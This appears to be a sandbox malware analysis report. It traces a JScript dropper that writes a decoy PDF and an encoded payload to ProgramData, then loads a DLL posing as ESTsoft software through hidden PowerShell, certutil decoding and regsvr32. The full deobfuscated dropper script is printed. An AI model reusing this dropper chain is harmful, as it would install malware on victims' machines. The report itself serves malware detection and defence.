                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Start time:10:59:10
                Start date:25/08/2021
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
                Imagebase:0x7ff7c39f0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET

                General

                Start time:10:59:11
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Start time:10:59:13
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Start time:10:59:17
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, Author: Florian Roth

                General

                Start time:10:59:28
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Start time:10:59:22
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Start time:10:59:35
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                Disassembly

                Code Analysis

                Call Graph

                Graph

                • Executed
                • Not Executed
                callgraph clusterC0 clusterC2C0 clusterC10C2 clusterC4C0 clusterC6C0 clusterC24C6 clusterC8C0 clusterC12C0 clusterC14C12 clusterC16C12 clusterC18C12 clusterC20C12 clusterC22C0 clusterC26C0 clusterC28C26 clusterC30C26 clusterC32C26 clusterC34C26 clusterC36C0 clusterC38C0 clusterC40C0 E1C0 entry:C0 F11C10 createElement E1C0->F11C10 F5C4 CreateObject E1C0->F5C4 F25C24 Run E1C0->F25C24 F9C8 GetSpecialFolder E1C0->F9C8 F15C14 Open E1C0->F15C14 F17C16 Write E1C0->F17C16 F19C18 SaveToFile E1C0->F19C18 F21C20 Close E1C0->F21C20 F23C22 FileExists E1C0->F23C22 F29C28 Open E1C0->F29C28 F31C30 Write E1C0->F31C30 F33C32 SaveToFile E1C0->F33C32 F35C34 Close E1C0->F35C34 F37C36 FileExists E1C0->F37C36 F39C38 Sleep E1C0->F39C38 F41C40 FileExists E1C0->F41C40 F3C2 ActiveXObject("Microsoft.XMLDOM") F7C6 ActiveXObject("WScript.Shell") F13C12 ActiveXObject("ADODB.Stream") F27C26 ActiveXObject("ADODB.Stream")

                Script:

                Code
                0
                try
                  1
                  {
                    2
                    d6rdVIu1CNC = "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2...
                      3
                      trhZnprDzG9 = "\xfffd\x0731\xfffd\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd 2021-05-07.pdf";
                        4
                        tbPaitkT4N4 = "VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU...
                          5
                          zzHMmkBwRtg = "efVo8cq.sIhn";
                            6
                            zIbtnpb1F3W = "glK7UwV.pR9a";
                              7
                              jfKuGes = new ActiveXObject ( "Microsoft.XMLDOM" );
                                8
                                bbIIrjT = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                9
                                puXN8a04N = new ActiveXObject ( "WScript.Shell" );
                                  10
                                  d5OiKu6nsDP = bbIIrjT.GetSpecialFolder ( 0 ) + "\\..\\ProgramData";
                                  • GetSpecialFolder(0) ➔ C:\Windows
                                  11
                                  m5NxSERTu = jfKuGes.createElement ( "yJ2bTRX" );
                                  • createElement("yJ2bTRX") ➔
                                  12
                                  m5NxSERTu.dataType = "bin.base64";
                                    13
                                    m5NxSERTu.text = d6rdVIu1CNC;
                                      14
                                      ubC93V43Ytyiws1 = m5NxSERTu.nodeTypedValue;
                                        15
                                        fTFlXWHxRT1bQ = new ActiveXObject ( "ADODB.Stream" );
                                          16
                                          fTFlXWHxRT1bQ.Open ( );
                                          • Open() ➔ undefined
                                          17
                                          fTFlXWHxRT1bQ.Type = 1;
                                            18
                                            fTFlXWHxRT1bQ.Write ( ubC93V43Ytyiws1 );
                                            • Write() ➔ undefined
                                            19
                                            fTFlXWHxRT1bQ.SaveToFile ( d5OiKu6nsDP + "\\" + trhZnprDzG9, 2 );
                                            • SaveToFile("C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd\...",2) ➔ undefined
                                            20
                                            fTFlXWHxRT1bQ.Close ( );
                                            • Close() ➔ undefined
                                            21
                                            if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + trhZnprDzG9 ) )
                                            • FileExists("C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd\...") ➔ true
                                            22
                                            {
                                              23
                                              try
                                                24
                                                {
                                                  25
                                                  puXN8a04N.Run ( "\"" + d5OiKu6nsDP + "\\" + trhZnprDzG9 + "\"" );
                                                  • Run(""C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd...") ➔ 0
                                                  26
                                                  }
                                                    27
                                                    catch ( e )
                                                      28
                                                      {
                                                        29
                                                        }
                                                          30
                                                          }
                                                            31
                                                            a9PDYO8b9 = jfKuGes.createElement ( "bnKtD9l" );
                                                            • createElement("bnKtD9l") ➔
                                                            32
                                                            a9PDYO8b9.dataType = "bin.base64";
                                                              33
                                                              a9PDYO8b9.text = tbPaitkT4N4;
                                                                34
                                                                fKdiu33gSKzghNi = a9PDYO8b9.nodeTypedValue;
                                                                  35
                                                                  jYubb9j555tQW = new ActiveXObject ( "ADODB.Stream" );
                                                                    36
                                                                    jYubb9j555tQW.Open ( );
                                                                    • Open() ➔ undefined
                                                                    37
                                                                    jYubb9j555tQW.Type = 1;
                                                                      38
                                                                      jYubb9j555tQW.Write ( fKdiu33gSKzghNi );
                                                                      • Write() ➔ undefined
                                                                      39
                                                                      jYubb9j555tQW.SaveToFile ( d5OiKu6nsDP + "\\" + zzHMmkBwRtg, 2 );
                                                                      • SaveToFile("C:\Windows\..\ProgramData\efVo8cq.sIhn",2) ➔ undefined
                                                                      40
                                                                      jYubb9j555tQW.Close ( );
                                                                      • Close() ➔ undefined
                                                                      41
                                                                      if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + zzHMmkBwRtg ) )
                                                                      • FileExists("C:\Windows\..\ProgramData\efVo8cq.sIhn") ➔ true
                                                                      42
                                                                      {
                                                                        43
                                                                        try
                                                                          44
                                                                          {
                                                                            45
                                                                            puXN8a04N.Run ( "powershell.exe -windowstyle hidden certutil -decode " + d5OiKu6nsDP + "\\" + zzH...
                                                                            • Run("powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Wi...",0,true) ➔ 0
                                                                            46
                                                                            WScript.Sleep ( 10 * 1000 );
                                                                            • Windows Script Host.Sleep(10000) ➔ undefined
                                                                            47
                                                                            }
                                                                              48
                                                                              catch ( e )
                                                                                49
                                                                                {
                                                                                  50
                                                                                  }
                                                                                    51
                                                                                    }
                                                                                      52
                                                                                      if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + zIbtnpb1F3W ) )
                                                                                      • FileExists("C:\Windows\..\ProgramData\glK7UwV.pR9a") ➔ true
                                                                                      53
                                                                                      {
                                                                                        54
                                                                                        try
                                                                                          55
                                                                                          {
                                                                                            56
                                                                                            puXN8a04N.Run ( "powershell.exe -windowstyle hidden regsvr32.exe /s " + d5OiKu6nsDP + "\\" + zIbt...
                                                                                            • Run("powershell.exe -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a",0,true) ➔ 0
                                                                                            57
                                                                                            }
                                                                                              58
                                                                                              catch ( e )
                                                                                                59
                                                                                                {
                                                                                                  60
                                                                                                  }
                                                                                                    61
                                                                                                    }
                                                                                                      62
                                                                                                      }
                                                                                                        63
                                                                                                        catch ( e )
                                                                                                          64
                                                                                                          {
                                                                                                            65
                                                                                                            }
                                                                                                              Reset < >

                                                                                                                Executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.455759806.00007FF92ABB0000.00000040.00000001.sdmp, Offset: 00007FF92ABB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ff92abb0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7cdd028d473a66b94409b2756684801ecd44d0574cfd85c32c7e75db4444718
                                                                                                                • Instruction ID: c2bc3e6f05274e69dd349349784f3627046863ec3c894c0fdef27fe1a2bbc514
                                                                                                                • Opcode Fuzzy Hash: d7cdd028d473a66b94409b2756684801ecd44d0574cfd85c32c7e75db4444718
                                                                                                                • Instruction Fuzzy Hash: 8501677111CB0C4FD744EF0CE451AA9B7E0FB95324F50056EE58AC3691D636E892CB46
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Non-executed Functions

                                                                                                                Executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.527931144.00007FF92AC30000.00000040.00000001.sdmp, Offset: 00007FF92AC30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ff92ac30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a1097b688274331deb7755fff744f21102ea0ca000cc610780641121fb74799c
                                                                                                                • Instruction ID: 46df73095c5545ec6211eca0e64841009b86b13ea09ffd7a2020c61878b28508
                                                                                                                • Opcode Fuzzy Hash: a1097b688274331deb7755fff744f21102ea0ca000cc610780641121fb74799c
                                                                                                                • Instruction Fuzzy Hash: 1E01677111CB0C4FDB44EF0CE451AB5B7E0FB95324F50056EE58AC3651D636E892CB46
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Non-executed Functions

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9, xrefs: 00007FF983DAE26E
                                                                                                                • fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df, xrefs: 00007FF983DB0810
                                                                                                                • d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7, xrefs: 00007FF983DAFBD8
                                                                                                                • bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1, xrefs: 00007FF983DAE5F6
                                                                                                                • 74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb, xrefs: 00007FF983DAE11B
                                                                                                                • 9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33, xrefs: 00007FF983DB0206
                                                                                                                • 19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0, xrefs: 00007FF983DACD37
                                                                                                                • 66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201, xrefs: 00007FF983DB08F2
                                                                                                                • 931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112, xrefs: 00007FF983DB0AB6
                                                                                                                • f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e, xrefs: 00007FF983DAE9EF
                                                                                                                • 27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7, xrefs: 00007FF983DADFC8
                                                                                                                • 6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18, xrefs: 00007FF983DABDD8
                                                                                                                • 8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e, xrefs: 00007FF983DAD257
                                                                                                                • ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62, xrefs: 00007FF983DAE82B
                                                                                                                • 7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f, xrefs: 00007FF983DAEBA7
                                                                                                                • 68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03, xrefs: 00007FF983DAFB67
                                                                                                                • adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db, xrefs: 00007FF983DB00B3
                                                                                                                • a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac, xrefs: 00007FF983DAD618
                                                                                                                • f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7, xrefs: 00007FF983DAFA20
                                                                                                                • a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849, xrefs: 00007FF983DAC817
                                                                                                                • 80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f, xrefs: 00007FF983DAD39F
                                                                                                                • 6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153, xrefs: 00007FF983DAF011
                                                                                                                • cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee, xrefs: 00007FF983DB034D
                                                                                                                • d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3, xrefs: 00007FF983DAF868
                                                                                                                • f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312, xrefs: 00007FF983DACE7F
                                                                                                                • dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1, xrefs: 00007FF983DAE0AA
                                                                                                                • a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529, xrefs: 00007FF983DAFD9C
                                                                                                                • 2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3, xrefs: 00007FF983DAFD2B
                                                                                                                • bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee, xrefs: 00007FF983DAF551
                                                                                                                • 2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214, xrefs: 00007FF983DB0A45
                                                                                                                • cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0, xrefs: 00007FF983DB072E
                                                                                                                • 6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34, xrefs: 00007FF983DAF164
                                                                                                                • d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4, xrefs: 00007FF983DAEF2F
                                                                                                                • a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653, xrefs: 00007FF983DAF6A4
                                                                                                                • c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2, xrefs: 00007FF983DAC067
                                                                                                                • 326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d, xrefs: 00007FF983DB04F9
                                                                                                                • 7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07, xrefs: 00007FF983DADA11
                                                                                                                • 60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c, xrefs: 00007FF983DAF633
                                                                                                                • 8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3, xrefs: 00007FF983DAD7DC
                                                                                                                • c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1, xrefs: 00007FF983DB0F14
                                                                                                                • 6f46400e097576c089e1826b85a329f52906284205151baf60e80608da, xrefs: 00007FF983DAD454
                                                                                                                • bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af, xrefs: 00007FF983DAE4A3
                                                                                                                • eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae, xrefs: 00007FF983DAD689
                                                                                                                • 8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6, xrefs: 00007FF983DAEB42
                                                                                                                • 1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69, xrefs: 00007FF983DADF57
                                                                                                                • d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd, xrefs: 00007FF983DADE04
                                                                                                                • 23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c, xrefs: 00007FF983DB064C
                                                                                                                • 35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b, xrefs: 00007FF983DAE90D
                                                                                                                • 2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488, xrefs: 00007FF983DB0D5C
                                                                                                                • 75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c, xrefs: 00007FF983DADC40
                                                                                                                • ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3, xrefs: 00007FF983DAFE0D
                                                                                                                • c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909, xrefs: 00007FF983DAFEEF
                                                                                                                • 65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148, xrefs: 00007FF983DAF5C2
                                                                                                                • e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b, xrefs: 00007FF983DAEAD1
                                                                                                                • 90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277, xrefs: 00007FF983DB0042
                                                                                                                • ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1, xrefs: 00007FF983DAFE7E
                                                                                                                • f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5, xrefs: 00007FF983DAECFA
                                                                                                                • 9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9, xrefs: 00007FF983DABF1F
                                                                                                                • 66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f, xrefs: 00007FF983DAFCBA
                                                                                                                • ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace, xrefs: 00007FF983DAEC18
                                                                                                                • ff37083708963434836f8f0c252e8680adff9bc9a0451464a4, xrefs: 00007FF983DAF246
                                                                                                                • 93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb, xrefs: 00007FF983DAFAF6
                                                                                                                • 5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2, xrefs: 00007FF983DAE7BA
                                                                                                                • 0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371, xrefs: 00007FF983DAD10F
                                                                                                                • 10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204, xrefs: 00007FF983DB09D4
                                                                                                                • 6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84, xrefs: 00007FF983DAC2F7
                                                                                                                • c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef, xrefs: 00007FF983DADBCF
                                                                                                                • ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335, xrefs: 00007FF983DADE75
                                                                                                                • ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43, xrefs: 00007FF983DAC587
                                                                                                                • 10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861, xrefs: 00007FF983DAE3C1
                                                                                                                • 8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751, xrefs: 00007FF983DB0488
                                                                                                                • 06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5, xrefs: 00007FF983DAF0F3
                                                                                                                • e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c, xrefs: 00007FF983DB0B98
                                                                                                                • 85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334, xrefs: 00007FF983DAC6CF
                                                                                                                • ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0, xrefs: 00007FF983DB05DB
                                                                                                                • 4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc, xrefs: 00007FF983DAD84D
                                                                                                                • dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581, xrefs: 00007FF983DAF7F7
                                                                                                                • 27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f, xrefs: 00007FF983DAC1AF
                                                                                                                • d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce, xrefs: 00007FF983DB03B2
                                                                                                                • 277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23, xrefs: 00007FF983DAE749
                                                                                                                • cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d, xrefs: 00007FF983DAD9A0
                                                                                                                • 360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91, xrefs: 00007FF983DAD5A7
                                                                                                                • 68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046, xrefs: 00007FF983DAFFD1
                                                                                                                • 26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f, xrefs: 00007FF983DADB64
                                                                                                                • 8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450, xrefs: 00007FF983DAD8BE
                                                                                                                • c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae, xrefs: 00007FF983DAEEBE
                                                                                                                • 91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a, xrefs: 00007FF983DAE1FD
                                                                                                                • f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a, xrefs: 00007FF983DAF46F
                                                                                                                • 0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997, xrefs: 00007FF983DAE432
                                                                                                                • ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1, xrefs: 00007FF983DAD76B
                                                                                                                • 475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923, xrefs: 00007FF983DAE2DF
                                                                                                                • af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a, xrefs: 00007FF983DAF93E
                                                                                                                • dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb, xrefs: 00007FF983DB06BD
                                                                                                                • c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494, xrefs: 00007FF983DB0881
                                                                                                                • 8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f, xrefs: 00007FF983DADEE6
                                                                                                                • 7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e, xrefs: 00007FF983DB0963
                                                                                                                • 6d079b4125d59aa358b2f5904df97d742f41aeade445, xrefs: 00007FF983DAF4E0
                                                                                                                • a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd, xrefs: 00007FF983DACBEF
                                                                                                                • d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57, xrefs: 00007FF983DB0F81
                                                                                                                • bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697, xrefs: 00007FF983DADD93
                                                                                                                • d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea, xrefs: 00007FF983DAF1D5
                                                                                                                • 1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78, xrefs: 00007FF983DAF786
                                                                                                                • d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee, xrefs: 00007FF983DAEA60
                                                                                                                • bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64, xrefs: 00007FF983DB0E3E
                                                                                                                • a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a, xrefs: 00007FF983DAFF60
                                                                                                                • 51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5, xrefs: 00007FF983DAE350
                                                                                                                • bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147, xrefs: 00007FF983DAF3FE
                                                                                                                • 784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635, xrefs: 00007FF983DAF2B7
